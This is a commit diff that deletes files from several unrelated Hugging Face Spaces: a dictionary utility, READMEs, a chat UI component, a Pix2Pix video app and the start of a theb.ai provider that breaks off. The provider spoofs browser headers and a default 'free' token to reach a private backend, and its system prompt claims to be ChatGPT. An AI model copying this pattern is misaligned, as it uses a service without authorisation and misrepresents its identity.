if override:
|
268 |
-
new_dict = {**old_dict, **dict_data}
|
269 |
-
else:
|
270 |
-
new_dict = {**dict_data, **old_dict}
|
271 |
-
write_to_json(user_dict=new_dict, user_dict_path=user_dict_path)
|
272 |
-
update_dict(
|
273 |
-
default_dict_path=default_dict_path,
|
274 |
-
user_dict_path=user_dict_path,
|
275 |
-
compiled_dict_path=compiled_dict_path,
|
276 |
-
)
|
277 |
-
|
278 |
-
|
279 |
-
def search_cost_candidates(context_id: int) -> List[int]:
|
280 |
-
for value in part_of_speech_data.values():
|
281 |
-
if value.context_id == context_id:
|
282 |
-
return value.cost_candidates
|
283 |
-
raise HTTPException(status_code=422, detail="品詞IDが不正です")
|
284 |
-
|
285 |
-
|
286 |
-
def cost2priority(context_id: int, cost: conint(ge=-32768, le=32767)) -> int:
|
287 |
-
cost_candidates = search_cost_candidates(context_id)
|
288 |
-
# cost_candidatesの中にある値で最も近い値を元にpriorityを返す
|
289 |
-
# 参考: https://qiita.com/Krypf/items/2eada91c37161d17621d
|
290 |
-
# この関数とpriority2cost関数によって、辞書ファイルのcostを操作しても最も近いpriorityのcostに上書きされる
|
291 |
-
return MAX_PRIORITY - np.argmin(np.abs(np.array(cost_candidates) - cost))
|
292 |
-
|
293 |
-
|
294 |
-
def priority2cost(
|
295 |
-
context_id: int, priority: conint(ge=MIN_PRIORITY, le=MAX_PRIORITY)
|
296 |
-
) -> int:
|
297 |
-
cost_candidates = search_cost_candidates(context_id)
|
298 |
-
return cost_candidates[MAX_PRIORITY - priority]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/4th3n4/TraDeX/README.md
DELETED
@@ -1,23 +0,0 @@
|
|
1 |
-
---
|
2 |
-
title: TraDeX
|
3 |
-
emoji: 📊
|
4 |
-
colorFrom: red
|
5 |
-
colorTo: pink
|
6 |
-
sdk: gradio
|
7 |
-
sdk_version: 3.39.0
|
8 |
-
app_file: app.py
|
9 |
-
pinned: false
|
10 |
-
license: agpl-3.0
|
11 |
-
---
|
12 |
-
# TraDeX
|
13 |
-
|
14 |
-
This is a demo app for the TraDeX app, which is a TFT and CNN-LSTM based app for Stock Price prediction.
|
15 |
-
|
16 |
-
## How to use this app
|
17 |
-
|
18 |
-
1. Upload the CSV file of the company you wish to predict the stock price of. (NOTE: The CSV file should contain the columns as present in sample file available in the app)
|
19 |
-
2. Click "Submit" and wait for the prediction to be made.
|
20 |
-
3. You'll get the results in form of CSV file, download it and you're done!
|
21 |
-
|
22 |
-
---
|
23 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/A00001/bingothoo/src/components/chat.tsx
DELETED
@@ -1,93 +0,0 @@
|
|
1 |
-
'use client'
|
2 |
-
|
3 |
-
import { useCallback, useEffect, useMemo, useState } from 'react'
|
4 |
-
import { useAtom } from 'jotai'
|
5 |
-
import Image from 'next/image'
|
6 |
-
import { cn } from '@/lib/utils'
|
7 |
-
import { ChatList } from '@/components/chat-list'
|
8 |
-
import { ChatPanel } from '@/components/chat-panel'
|
9 |
-
import { WelcomeScreen } from '@/components/welcome-screen'
|
10 |
-
import { ChatScrollAnchor } from '@/components/chat-scroll-anchor'
|
11 |
-
import { ToneSelector } from './tone-selector'
|
12 |
-
import { ChatHeader } from './chat-header'
|
13 |
-
import { ChatSuggestions } from './chat-suggestions'
|
14 |
-
import { bingConversationStyleAtom } from '@/state'
|
15 |
-
import { ButtonScrollToBottom } from '@/components/button-scroll-to-bottom'
|
16 |
-
import StopIcon from '@/assets/images/stop.svg'
|
17 |
-
import { useBing } from '@/lib/hooks/use-bing'
|
18 |
-
import { ChatMessageModel } from '@/lib/bots/bing/types'
|
19 |
-
import { ChatNotification } from './chat-notification'
|
20 |
-
import { Settings } from './settings'
|
21 |
-
import { ChatHistory } from './chat-history'
|
22 |
-
|
23 |
-
export type ChatProps = React.ComponentProps<'div'> & { initialMessages?: ChatMessageModel[] }
|
24 |
-
|
25 |
-
export default function Chat({ className }: ChatProps) {
|
26 |
-
|
27 |
-
const [bingStyle, setBingStyle] = useAtom(bingConversationStyleAtom)
|
28 |
-
const {
|
29 |
-
messages,
|
30 |
-
sendMessage,
|
31 |
-
resetConversation,
|
32 |
-
stopGenerating,
|
33 |
-
setInput,
|
34 |
-
bot,
|
35 |
-
input,
|
36 |
-
generating,
|
37 |
-
isSpeaking,
|
38 |
-
uploadImage,
|
39 |
-
attachmentList,
|
40 |
-
setAttachmentList,
|
41 |
-
} = useBing()
|
42 |
-
|
43 |
-
useEffect(() => {
|
44 |
-
window.scrollTo({
|
45 |
-
top: document.body.offsetHeight,
|
46 |
-
behavior: 'smooth'
|
47 |
-
})
|
48 |
-
}, [])
|
49 |
-
|
50 |
-
return (
|
51 |
-
<div className="flex flex-1 flex-col">
|
52 |
-
<Settings />
|
53 |
-
<div className={cn('flex-1 pb-16', className)}>
|
54 |
-
<ChatHeader />
|
55 |
-
<WelcomeScreen setInput={setInput} />
|
56 |
-
<ToneSelector type={bingStyle} onChange={setBingStyle} />
|
57 |
-
{messages.length ? (
|
58 |
-
<>
|
59 |
-
<ChatList messages={messages} />
|
60 |
-
<ChatScrollAnchor trackVisibility={generating} />
|
61 |
-
<ChatNotification message={messages.at(-1)} bot={bot} />
|
62 |
-
<ChatSuggestions setInput={setInput} suggestions={messages.at(-1)?.suggestedResponses} />
|
63 |
-
|
64 |
-
{generating ? (
|
65 |
-
<div className="flex h-10 items-center justify-center my-4">
|
66 |
-
<button
|
67 |
-
onClick={stopGenerating}
|
68 |
-
className="typing-control-item stop"
|
69 |
-
>
|
70 |
-
<Image alt="stop" src={StopIcon} width={24} className="mr-1" />
|
71 |
-
<span>停止响应</span>
|
72 |
-
</button>
|
73 |
-
</div>
|
74 |
-
) : null}
|
75 |
-
</>
|
76 |
-
) : null}
|
77 |
-
</div>
|
78 |
-
<ChatPanel
|
79 |
-
className="pt-24 z-10"
|
80 |
-
isSpeaking={isSpeaking}
|
81 |
-
generating={generating}
|
82 |
-
sendMessage={sendMessage}
|
83 |
-
input={input}
|
84 |
-
setInput={setInput}
|
85 |
-
resetConversation={resetConversation}
|
86 |
-
uploadImage={uploadImage}
|
87 |
-
attachmentList={attachmentList}
|
88 |
-
setAttachmentList={setAttachmentList}
|
89 |
-
/>
|
90 |
-
<ButtonScrollToBottom />
|
91 |
-
</div>
|
92 |
-
)
|
93 |
-
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/AIFILMS/Pix2Pix-Video/app.py
DELETED
@@ -1,248 +0,0 @@
|
|
1 |
-
import gradio as gr
|
2 |
-
import os
|
3 |
-
import cv2
|
4 |
-
import numpy as np
|
5 |
-
from moviepy.editor import *
|
6 |
-
from share_btn import community_icon_html, loading_icon_html, share_js
|
7 |
-
|
8 |
-
from diffusers import DiffusionPipeline, EulerAncestralDiscreteScheduler
|
9 |
-
import torch
|
10 |
-
from PIL import Image
|
11 |
-
import time
|
12 |
-
import psutil
|
13 |
-
import random
|
14 |
-
|
15 |
-
is_shared_ui = True if "AIFILMS/Pix2Pix-Video" in os.environ['SPACE_ID'] else False
|
16 |
-
|
17 |
-
pipe = DiffusionPipeline.from_pretrained("timbrooks/instruct-pix2pix", torch_dtype=torch.float16, safety_checker=None)
|
18 |
-
pipe.scheduler = EulerAncestralDiscreteScheduler.from_config(pipe.scheduler.config)
|
19 |
-
if(not is_shared_ui):
|
20 |
-
pipe.enable_xformers_memory_efficient_attention()
|
21 |
-
pipe.unet.to(memory_format=torch.channels_last)
|
22 |
-
|
23 |
-
device = "GPU 🔥" if torch.cuda.is_available() else "CPU 🥶"
|
24 |
-
|
25 |
-
if torch.cuda.is_available():
|
26 |
-
pipe = pipe.to("cuda")
|
27 |
-
|
28 |
-
def pix2pix(
|
29 |
-
prompt,
|
30 |
-
text_guidance_scale,
|
31 |
-
image_guidance_scale,
|
32 |
-
image,
|
33 |
-
steps,
|
34 |
-
neg_prompt="",
|
35 |
-
width=512,
|
36 |
-
height=512,
|
37 |
-
seed=0,
|
38 |
-
):
|
39 |
-
print(psutil.virtual_memory()) # print memory usage
|
40 |
-
|
41 |
-
if seed == 0:
|
42 |
-
seed = random.randint(0, 2147483647)
|
43 |
-
|
44 |
-
generator = torch.Generator("cuda").manual_seed(seed)
|
45 |
-
|
46 |
-
try:
|
47 |
-
image = Image.open(image)
|
48 |
-
ratio = min(height / image.height, width / image.width)
|
49 |
-
image = image.resize((int(image.width * ratio), int(image.height * ratio)), Image.LANCZOS)
|
50 |
-
|
51 |
-
result = pipe(
|
52 |
-
prompt,
|
53 |
-
negative_prompt=neg_prompt,
|
54 |
-
image=image,
|
55 |
-
num_inference_steps=int(steps),
|
56 |
-
image_guidance_scale=image_guidance_scale,
|
57 |
-
guidance_scale=text_guidance_scale,
|
58 |
-
generator=generator,
|
59 |
-
)
|
60 |
-
|
61 |
-
# return replace_nsfw_images(result)
|
62 |
-
return result.images, result.nsfw_content_detected, seed
|
63 |
-
except Exception as e:
|
64 |
-
return None, None, error_str(e)
|
65 |
-
|
66 |
-
def error_str(error, title="Error"):
|
67 |
-
return (
|
68 |
-
f"""#### {title}
|
69 |
-
{error}"""
|
70 |
-
if error
|
71 |
-
else ""
|
72 |
-
)
|
73 |
-
|
74 |
-
def get_frames(video_in):
|
75 |
-
frames = []
|
76 |
-
#resize the video
|
77 |
-
clip = VideoFileClip(video_in)
|
78 |
-
|
79 |
-
#check fps
|
80 |
-
if clip.fps > 30:
|
81 |
-
print("vide rate is over 30, resetting to 30")
|
82 |
-
clip_resized = clip.resize(height=512)
|
83 |
-
clip_resized.write_videofile("video_resized.mp4", fps=30)
|
84 |
-
else:
|
85 |
-
print("video rate is OK")
|
86 |
-
clip_resized = clip.resize(height=512)
|
87 |
-
clip_resized.write_videofile("video_resized.mp4", fps=clip.fps)
|
88 |
-
|
89 |
-
print("video resized to 512 height")
|
90 |
-
|
91 |
-
# Opens the Video file with CV2
|
92 |
-
cap= cv2.VideoCapture("video_resized.mp4")
|
93 |
-
|
94 |
-
fps = cap.get(cv2.CAP_PROP_FPS)
|
95 |
-
print("video fps: " + str(fps))
|
96 |
-
i=0
|
97 |
-
while(cap.isOpened()):
|
98 |
-
ret, frame = cap.read()
|
99 |
-
if ret == False:
|
100 |
-
break
|
101 |
-
cv2.imwrite('kang'+str(i)+'.jpg',frame)
|
102 |
-
frames.append('kang'+str(i)+'.jpg')
|
103 |
-
i+=1
|
104 |
-
|
105 |
-
cap.release()
|
106 |
-
cv2.destroyAllWindows()
|
107 |
-
print("broke the video into frames")
|
108 |
-
|
109 |
-
return frames, fps
|
110 |
-
|
111 |
-
|
112 |
-
def create_video(frames, fps):
|
113 |
-
print("building video result")
|
114 |
-
clip = ImageSequenceClip(frames, fps=fps)
|
115 |
-
clip.write_videofile("movie.mp4", fps=fps)
|
116 |
-
|
117 |
-
return 'movie.mp4'
|
118 |
-
|
119 |
-
|
120 |
-
def infer(prompt,video_in, seed_in, trim_value):
|
121 |
-
if(is_shared_ui):
|
122 |
-
raise gr.Error("This Space doesn't work on this shared UI.")
|
123 |
-
print(prompt)
|
124 |
-
break_vid = get_frames(video_in)
|
125 |
-
|
126 |
-
frames_list= break_vid[0]
|
127 |
-
fps = break_vid[1]
|
128 |
-
n_frame = int(trim_value*fps)
|
129 |
-
|
130 |
-
if n_frame >= len(frames_list):
|
131 |
-
print("video is shorter than the cut value")
|
132 |
-
n_frame = len(frames_list)
|
133 |
-
|
134 |
-
result_frames = []
|
135 |
-
print("set stop frames to: " + str(n_frame))
|
136 |
-
|
137 |
-
for i in frames_list[0:int(n_frame)]:
|
138 |
-
pix2pix_img = pix2pix(prompt,5.5,1.5,i,15,"",512,512,seed_in)
|
139 |
-
images = pix2pix_img[0]
|
140 |
-
rgb_im = images[0].convert("RGB")
|
141 |
-
|
142 |
-
# exporting the image
|
143 |
-
rgb_im.save(f"result_img-{i}.jpg")
|
144 |
-
result_frames.append(f"result_img-{i}.jpg")
|
145 |
-
print("frame " + i + "/" + str(n_frame) + ": done;")
|
146 |
-
|
147 |
-
final_vid = create_video(result_frames, fps)
|
148 |
-
print("finished !")
|
149 |
-
|
150 |
-
return final_vid, gr.Group.update(visible=True)
|
151 |
-
|
152 |
-
title = """
|
153 |
-
<div style="text-align: center; max-width: 700px; margin: 0 auto;">
|
154 |
-
<div
|
155 |
-
style="
|
156 |
-
display: inline-flex;
|
157 |
-
align-items: center;
|
158 |
-
gap: 0.8rem;
|
159 |
-
font-size: 1.75rem;
|
160 |
-
"
|
161 |
-
>
|
162 |
-
<h1 style="font-weight: 900; margin-bottom: 7px; margin-top: 5px;">
|
163 |
-
Pix2Pix Video
|
164 |
-
</h1>
|
165 |
-
</div>
|
166 |
-
<p style="margin-bottom: 10px; font-size: 94%">
|
167 |
-
Apply Instruct Pix2Pix Diffusion to a video
|
168 |
-
</p>
|
169 |
-
</div>
|
170 |
-
"""
|
171 |
-
|
172 |
-
article = """
|
173 |
-
|
174 |
-
<div class="footer">
|
175 |
-
<p>
|
176 |
-
Examples by <a href="https://twitter.com/CitizenPlain" target="_blank">Nathan Shipley</a> •
|
177 |
-
Follow <a href="https://twitter.com/fffiloni" target="_blank">Sylvain Filoni</a> for future updates 🤗
|
178 |
-
</p>
|
179 |
-
</div>
|
180 |
-
<div id="may-like-container" style="display: flex;justify-content: center;flex-direction: column;align-items: center;margin-bottom: 30px;">
|
181 |
-
<p>You may also like: </p>
|
182 |
-
<div id="may-like-content" style="display:flex;flex-wrap: wrap;align-items:center;height:20px;">
|
183 |
-
|
184 |
-
<svg height="20" width="162" style="margin-left:4px;margin-bottom: 6px;">
|
185 |
-
<a href="https://huggingface.co/spaces/timbrooks/instruct-pix2pix" target="_blank">
|
186 |
-
<image href="https://img.shields.io/badge/🤗 Spaces-Instruct_Pix2Pix-blue" src="https://img.shields.io/badge/🤗 Spaces-Instruct_Pix2Pix-blue.png" height="20"/>
|
187 |
-
</a>
|
188 |
-
</svg>
|
189 |
-
|
190 |
-
</div>
|
191 |
-
|
192 |
-
</div>
|
193 |
-
|
194 |
-
"""
|
195 |
-
|
196 |
-
with gr.Blocks(css='style.css') as demo:
|
197 |
-
if(is_shared_ui):
|
198 |
-
with gr.Box():
|
199 |
-
top_description = gr.HTML(f'''
|
200 |
-
<div class="gr-prose" style="max-width: 80%">
|
201 |
-
<h2 style="margin-top: 0">Attention - This Space doesn't work in this shared UI</h2>
|
202 |
-
<p>For it to work, you can access the <a href="https://huggingface.co/spaces/fffiloni/Pix2Pix-Video">original</a> or duplicate this Space and run it on your own profile using a GPU. <a class="duplicate-button" style="display:inline-block" target="_blank" href="https://huggingface.co/spaces/{os.environ['SPACE_ID']}?duplicate=true"><img src="https://img.shields.io/badge/-Duplicate%20Space-blue?labelColor=white&style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAP5JREFUOE+lk7FqAkEURY+ltunEgFXS2sZGIbXfEPdLlnxJyDdYB62sbbUKpLbVNhyYFzbrrA74YJlh9r079973psed0cvUD4A+4HoCjsA85X0Dfn/RBLBgBDxnQPfAEJgBY+A9gALA4tcbamSzS4xq4FOQAJgCDwV2CPKV8tZAJcAjMMkUe1vX+U+SMhfAJEHasQIWmXNN3abzDwHUrgcRGmYcgKe0bxrblHEB4E/pndMazNpSZGcsZdBlYJcEL9Afo75molJyM2FxmPgmgPqlWNLGfwZGG6UiyEvLzHYDmoPkDDiNm9JR9uboiONcBXrpY1qmgs21x1QwyZcpvxt9NS09PlsPAAAAAElFTkSuQmCC&logoWidth=14" alt="Duplicate Space"></a></p>
|
203 |
-
</div>
|
204 |
-
''')
|
205 |
-
with gr.Column(elem_id="col-container"):
|
206 |
-
gr.HTML(title)
|
207 |
-
with gr.Row():
|
208 |
-
with gr.Column():
|
209 |
-
video_inp = gr.Video(label="Video source", source="upload", type="filepath", elem_id="input-vid")
|
210 |
-
prompt = gr.Textbox(label="Prompt", placeholder="enter prompt", show_label=False, elem_id="prompt-in")
|
211 |
-
with gr.Row():
|
212 |
-
seed_inp = gr.Slider(label="Seed", minimum=0, maximum=2147483647, step=1, value=123456)
|
213 |
-
trim_in = gr.Slider(label="Cut video at (s)", minimun=1, maximum=3, step=1, value=1)
|
214 |
-
with gr.Column():
|
215 |
-
video_out = gr.Video(label="Pix2pix video result", elem_id="video-output")
|
216 |
-
gr.HTML("""
|
217 |
-
<a style="display:inline-block" href="https://huggingface.co/spaces/fffiloni/Pix2Pix-Video?duplicate=true"><img src="https://img.shields.io/badge/-Duplicate%20Space-blue?labelColor=white&style=flat&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAP5JREFUOE+lk7FqAkEURY+ltunEgFXS2sZGIbXfEPdLlnxJyDdYB62sbbUKpLbVNhyYFzbrrA74YJlh9r079973psed0cvUD4A+4HoCjsA85X0Dfn/RBLBgBDxnQPfAEJgBY+A9gALA4tcbamSzS4xq4FOQAJgCDwV2CPKV8tZAJcAjMMkUe1vX+U+SMhfAJEHasQIWmXNN3abzDwHUrgcRGmYcgKe0bxrblHEB4E/pndMazNpSZGcsZdBlYJcEL9Afo75molJyM2FxmPgmgPqlWNLGfwZGG6UiyEvLzHYDmoPkDDiNm9JR9uboiONcBXrpY1qmgs21x1QwyZcpvxt9NS09PlsPAAAAAElFTkSuQmCC&logoWidth=14" alt="Duplicate Space"></a>
|
218 |
-
work with longer videos / skip the queue:
|
219 |
-
""", elem_id="duplicate-container")
|
220 |
-
submit_btn = gr.Button("Generate Pix2Pix video")
|
221 |
-
|
222 |
-
with gr.Group(elem_id="share-btn-container", visible=False) as share_group:
|
223 |
-
community_icon = gr.HTML(community_icon_html)
|
224 |
-
loading_icon = gr.HTML(loading_icon_html)
|
225 |
-
share_button = gr.Button("Share to community", elem_id="share-btn")
|
226 |
-
|
227 |
-
inputs = [prompt,video_inp,seed_inp, trim_in]
|
228 |
-
outputs = [video_out, share_group]
|
229 |
-
|
230 |
-
ex = gr.Examples(
|
231 |
-
[
|
232 |
-
["Make it a marble sculpture", "./examples/pexels-jill-burrow-7665249_512x512.mp4", 422112651, 4],
|
233 |
-
["Make it molten lava", "./examples/Ocean_Pexels_ 8953474_512x512.mp4", 43571876, 4]
|
234 |
-
],
|
235 |
-
inputs=inputs,
|
236 |
-
outputs=outputs,
|
237 |
-
fn=infer,
|
238 |
-
cache_examples=False,
|
239 |
-
)
|
240 |
-
|
241 |
-
gr.HTML(article)
|
242 |
-
|
243 |
-
submit_btn.click(infer, inputs, outputs)
|
244 |
-
share_button.click(None, [], [], _js=share_js)
|
245 |
-
|
246 |
-
|
247 |
-
|
248 |
-
demo.launch().queue(max_size=12)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/AIZerotoHero-Health4All/03-Datasets/README.md
DELETED
@@ -1,12 +0,0 @@
|
|
1 |
-
---
|
2 |
-
title: 03 Datasets
|
3 |
-
emoji: 📊
|
4 |
-
colorFrom: gray
|
5 |
-
colorTo: green
|
6 |
-
sdk: gradio
|
7 |
-
sdk_version: 3.12.0
|
8 |
-
app_file: app.py
|
9 |
-
pinned: false
|
10 |
-
---
|
11 |
-
|
12 |
-
Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/ATang0729/Forecast4Muses/Model/Model6/__init__.py
DELETED
File without changes
|
spaces/AchyuthGamer/OpenGPT-Chat-UI/.svelte-kit/types/src/routes/r/[id]/proxy+page.server.ts
DELETED
@@ -1,35 +0,0 @@
|
|
1 |
-
// @ts-nocheck
|
2 |
-
import type { PageServerLoad } from "./$types";
|
3 |
-
import { collections } from "$lib/server/database";
|
4 |
-
import { error } from "@sveltejs/kit";
|
5 |
-
import type { WebSearchMessageResult } from "$lib/types/WebSearch";
|
6 |
-
|
7 |
-
export const load = async ({ params }: Parameters<PageServerLoad>[0]) => {
|
8 |
-
/*const conversation = await collections.sharedConversations.findOne({
|
9 |
-
_id: params.id,
|
10 |
-
});
|
11 |
-
|
12 |
-
if (!conversation) {
|
13 |
-
throw error(404, "Conversation not found");
|
14 |
-
}
|
15 |
-
|
16 |
-
const webSearchesId = conversation.messages
|
17 |
-
.filter((message) => message.webSearchId)
|
18 |
-
.map((message) => new ObjectId(message.webSearchId));
|
19 |
-
|
20 |
-
const results = await collections.webSearches.find({ _id: { $in: webSearchesId } }).toArray();
|
21 |
-
|
22 |
-
const searches = Object.fromEntries(
|
23 |
-
results.map((x) => [
|
24 |
-
x._id.toString(),
|
25 |
-
[...x.messages, { type: "result", id: x._id.toString() } satisfies WebSearchMessageResult],
|
26 |
-
])
|
27 |
-
);
|
28 |
-
|
29 |
-
return {
|
30 |
-
messages: conversation.messages,
|
31 |
-
title: conversation.title,
|
32 |
-
model: conversation.model,
|
33 |
-
searches,
|
34 |
-
};*/
|
35 |
-
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/AchyuthGamer/OpenGPT/g4f/Provider/Theb.py
DELETED
@@ -1,97 +0,0 @@
|
|
1 |
-
from __future__ import annotations
|
2 |
-
|
3 |
-
import json
|
4 |
-
import random
|
5 |
-
|
6 |
-
import requests
|
7 |
-
|
8 |
-
from ..typing import Any, CreateResult
|
9 |
-
from .base_provider import BaseProvider
|
10 |
-
|
11 |
-
|
12 |
-
class Theb(BaseProvider):
|
13 |
-
url = "https://theb.ai"
|
14 |
-
working = True
|
15 |
-
supports_stream = True
|
16 |
-
supports_gpt_35_turbo = True
|
17 |
-
needs_auth = True
|
18 |
-
|
19 |
-
@staticmethod
|
20 |
-
def create_completion(
|
21 |
-
model: str,
|
22 |
-
messages: list[dict[str, str]],
|
23 |
-
stream: bool, **kwargs: Any) -> CreateResult:
|
24 |
-
|
25 |
-
conversation = "\n".join(f"{message['role']}: {message['content']}" for message in messages)
|
26 |
-
conversation += "\nassistant: "
|
27 |
-
|
28 |
-
auth = kwargs.get("auth", {
|
29 |
-
"bearer_token":"free",
|
30 |
-
"org_id":"theb",
|
31 |
-
})
|
32 |
-
|
33 |
-
bearer_token = auth["bearer_token"]
|
34 |
-
org_id = auth["org_id"]
|
35 |
-
|
36 |
-
headers = {
|
37 |
-
'authority' : 'beta.theb.ai',
|
38 |
-
'accept' : 'text/event-stream',
|
39 |
-
'accept-language' : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
|
40 |
-
'authorization' : 'Bearer '+bearer_token,
|
41 |
-
'content-type' : 'application/json',
|
42 |
-
'origin' : 'https://beta.theb.ai',
|
43 |
-
'referer' : 'https://beta.theb.ai/home',
|
44 |
-
'sec-ch-ua' : '"Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"',
|
45 |
-
'sec-ch-ua-mobile' : '?0',
|
46 |
-
'sec-ch-ua-platform': '"Windows"',
|
47 |
-
'sec-fetch-dest' : 'empty',
|
48 |
-
'sec-fetch-mode' : 'cors',
|
49 |
-
'sec-fetch-site' : 'same-origin',
|
50 |
-
'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
|
51 |
-
'x-ai-model' : 'ee8d4f29cb7047f78cbe84313ed6ace8',
|
52 |
-
}
|
53 |
-
|
54 |
-
req_rand = random.randint(100000000, 9999999999)
|
55 |
-
|
56 |
-
json_data: dict[str, Any] = {
|
57 |
-
"text" : conversation,
|
58 |
-
"category" : "04f58f64a4aa4191a957b47290fee864",
|
59 |
-
"model" : "ee8d4f29cb7047f78cbe84313ed6ace8",
|
60 |
-
"model_params": {
|
61 |
-
"system_prompt" : "You are ChatGPT, a large language model trained by OpenAI, based on the GPT-3.5 architecture.\nKnowledge cutoff: 2021-09\nCurrent date: {{YYYY-MM-DD}}",
|
62 |
-
"temperature" : kwargs.get("temperature", 1),
|
63 |
-
"top_p" : kwargs.get("top_p", 1),
|
64 |
-
"frequency_penalty" : kwargs.get("frequency_penalty", 0),
|
65 |
-
"presence_penalty" : kwargs.get("presence_penalty", 0),
|
66 |
-
"long_term_memory" : "auto"
|
67 |
-
}
|
68 |
-
}
|
69 |
-
|
70 |
-
